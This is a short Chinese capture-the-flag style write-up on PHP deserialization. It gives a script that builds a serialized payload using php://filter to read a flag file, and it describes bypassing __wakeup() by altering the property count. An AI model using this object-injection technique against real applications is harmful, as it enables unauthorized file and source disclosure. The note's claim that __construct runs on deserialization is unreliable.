PHP反序列化
如题
第二个类没用到,只是用来示例。
第一个类在反序列化的时候调用__construct
,通过绕过__wakeup()
,直接执行__destruct()
payload:
<?php
class body{
private $todonothing = "f14g.php";
private $want = "php://filter/read=convert.base64-encode/resource=f14g.php";
}
$obj = new body();
$poc = urlencode(serialize($obj));
//$poc = serialize($obj);
echo $poc;
?>
输出payload后,修改参数数量,绕过__wakeup()